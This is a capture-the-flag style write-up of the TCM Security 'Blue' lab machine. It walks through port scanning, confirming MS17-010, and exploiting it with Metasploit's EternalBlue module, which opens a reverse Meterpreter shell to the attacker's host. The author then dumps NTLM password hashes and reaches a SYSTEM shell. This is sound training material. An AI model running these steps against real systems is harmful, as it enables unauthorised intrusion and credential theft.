Writeup: TCM PEH Capstone Blue
By SecBurg
This is a quick and dirty writeup for the Practical Ethical Hacking Course capstone machine called “Blue” on the TCM Security Academy.
It is a very easy one, because it is vulnerable to “Eternal Blue”.
-
scan for open ports and system info:
> rustscan -a 10.30.30.103 -- -A
Open 10.30.30.103:135
Open 10.30.30.103:139
Open 10.30.30.103:445
[...]
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
[...]
OS details: Microsoft Windows Vista SP2 or Windows 7 or Windows Server 2008 R2 or Windows 8.1
[...]
| smb-os-discovery:
| OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: WIN-845Q99OO4PP
| NetBIOS computer name: WIN-845Q99OO4PP\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-03-09T04:12:17-04:00
- nmap scan // metasploit scan for smb vulnerabilities:
> nmap -p 139,445 --script smb-vuln* 10.30.30.103
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: BC:24:11:FA:23:4F (Proxmox Server Solutions GmbH)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
- vulnerable to MS17-010 (Eternal Blue)!
- confirm with metasploit:
> msfconsole
> use auxiliary/scanner/smb/smb_ms17_010
> options
> set rhosts 10.30.30.103
> run
[+] 10.30.30.103:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.30.30.103:445 - Scanned 1 of 1 hosts (100% complete)
- exploit with metasploit:
> use exploit/windows/smb/ms17_010_eternalblue
> set rhost 10.30.30.103
> run
[*] Started reverse TCP handler on 10.30.30.102:4444
[*] 10.30.30.103:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.30.30.103:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.30.30.103:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.30.30.103:445 - The target is vulnerable.
[*] 10.30.30.103:445 - Connecting to target for exploitation.
[+] 10.30.30.103:445 - Connection established for exploitation.
[...]
[*] Sending stage (203846 bytes) to 10.30.30.103
[*] Meterpreter session 1 opened (10.30.30.102:4444 -> 10.30.30.103:49158) at 2025-03-09 09:27:30 +0100
[+] 10.30.30.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.30.30.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.30.30.103:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58f5081696f366cdc72491a2c4996bd5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:f580a1940b1f6759fbdd9f5c482ccdbb:::
user:1000:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
meterpreter > shell
Process 1392 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
… and that’s it! :-)